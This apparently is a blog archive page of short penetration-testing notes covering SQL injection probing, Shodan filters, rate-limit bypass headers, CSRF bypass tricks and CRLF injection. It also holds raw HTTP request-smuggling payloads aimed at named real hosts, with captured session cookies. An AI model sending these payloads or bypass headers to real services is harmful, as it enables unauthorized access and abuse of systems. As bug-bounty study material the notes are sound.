Port list for Angry Port Scanner (feel free to copy+paste into options)
Month: February 2023
Mullvad VPN
$5 VPN (why are you not using it yet???). Go get it here. Completely anonymous, no signing up, accepts crypto, no logs. Stop wasting money on shit VPN services.
SQL Injection
How to find a SQL injection vulnerability?
1) Logical Operation
One of the best ways to confirm a SQL injection is to make it perform a logical operation and check for the expected results. For example: if the GET parameter ?username=Slacker returns the same content as ?username=Slacker' or ?username=Slacker+'1'='1 then you have found a SQL injection.
2) Time Based SQL Injection
Most relative place…
Interesting Shodan Filters
» city » country
nginx city:"San Diego" country:US
» geo
Devices within a 50km radius of San Diego (32.8,-117): geo:32.8,-117,50
» hostname
"Server: gws" hostname:google
» net
net:216.219.0.0/16
» os
microsoft-iis os:"windows 2003"
» before/after
apache country:CH after:22/03/2010 before:4/6/2010
» port
proftpd port:21
21 (FTP) 22 (SSH) 23 (Telnet) 25 (SMTP) 53 (DNS) 80…
Play WoW for free
Download the Mists client: https://download.stormforge.gg/WoW_548.torrent
Change your realmlist
Change your wtf/config.wtf file
Go to your game directory and open the "config.wtf" file using a text editor, such as Notepad. Change the line which contains the realmlist to: "set realmlist logon.stormforge.gg". If you encounter a problem with saving it, make sure the realmlist file is NOT set to…
Arch Linux
OS install guide – https://wiki.archlinux.org/title/installation_guide
Installing Yay – https://www.tecmint.com/install-yay-aur-helper-in-arch-linux-and-manjaro/
Install Black Arch repositories – https://www.fosslinux.com/17105/how-to-install-blackarch-repositories-on-arch-linux.htm
rate limit bypass
https://huzaifa-tahir.medium.com/methods-to-bypass-rate-limit-5185e6c67ecd
2. Rate Limit Bypass Headers:
Most applications use X-Forwarded-For, a common method for identifying the originating IP address of the client. We all know that using the X-Forwarded-For: IP header can sometimes bypass rate limit protection. Sometimes adding the X-Forwarded-For: IP header twice instead of once can bypass rate limit protection.
X-Forwarded: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For-Ip: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forward-For: 127.0.0.1
Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
X-Originating-IP:…
HTTP request smuggling
POST /login HTTP/1.1
Host: staging-login.newrelic.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/70.0.3508.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Cookie: optimizelyEndUserId=oeu1547215128308r0.023321653201122228; ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id=%22a5f7b9bb-8c8a-4add-ac69-75200d4c46cb%22;
Content-Type: application/x-www-form-urlencoded
Content-Length: 189
Transfer-Encoding: chunked
Transfer-Encoding: foo

3e
return_to=https%3A%2F%2Fstaging-insights-embed.newrelic.com%2F
0

GET / HTTP/1.1
Host: staging-login.newrelic.com:123
X-Forwarded-Host: skeletonscribe.net
Content-Length: 10

x=

DELETE / HTTP/1.1
Transfer-Encoding: chunked
Host: api.zomato.com
Content-Length: 91
User-Agent: Treasure/6.7

0

GET https://YOUR_COLLAB_URL/desync/ HTTP/1.1
X: X
Safari/537.36TSNGUID=6093d809-7d9d-4d52-bfb9-335de9fb69b8; _ga=GA1.2.1374597116.1547216490; _gid=GA1.2.1093027572.1547216490; _gcl_au=1.1.1026642629.1547216493; _mkto_trk=id:412-MZS-894&token:_mch-newrelic.com-1547216493639-15775; __qca=P0-235566894-1547221374728; intercom-id-cyym0u3i=bd3a0989-6e9f-4e6d-a497-9a41ef6d5290; _fbp=fb.1.1547249472663.621468648; ei_client_id=5c39274682f6eb000fa6d52a; _golden_gate_session=bkRPMUZ3STBrY0laZG0zemY1Umg5cFVhcWpNaGpvZWN2T0tOM3hWL2p2UVdaVTJLZFh5NkJtQnZHV2FIR3hnZWpKaWFvM2F2WkRab3hjWTd5b3A1T2dOY20zWWNQaFhZNWVRZXFuRkFwU3l1YVZMdm1JSW9pSGd0UnRicnRBUVdhaGg3UXJQTFJ0c3ZkMHRyaHZqNjYreCt4dWUwVlp1UTdrSVFpSEx6akVITjRWWGNrSUR5NGdIdG80UnFJS2xpVTNlU1BpK0hjWEZJMVF1R2I4RlNNeUdicVdTWFVDQnBlQ0NQSXdNYXFJM2lDTWc5VldLOTJ3N1A3Wll5RytpZVNya2J1WTdTNUZ5UVFRNk5KVmt2TmNudlU3WDFQMVJPbGtkWXJJWXd1YjA9LS1MeU1EbTkrZ29qVVo2VkNUMDhnMVp3PT0%3D–155cef8a5f5d2bcb69b1d1952af040a3479aeacb; _gat=1
GET…
CSRF bypass
1- Change single char
2- Sending empty value of token
3- Replace with same length
4- Clickjacking
5- Changing POST/GET method
6- Remove CSRF parameter from request
7- Use another user's valid token
8- CSRF protection by Referer header? Remove the header [ADD in form ]
9- Bypass using subdomain [victim.com.attacker.com]
10- Try to decrypt hash (maybe CSRF…
CRLF injection
CRLF
The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line; however, they are dealt with differently in today's popular operating systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is…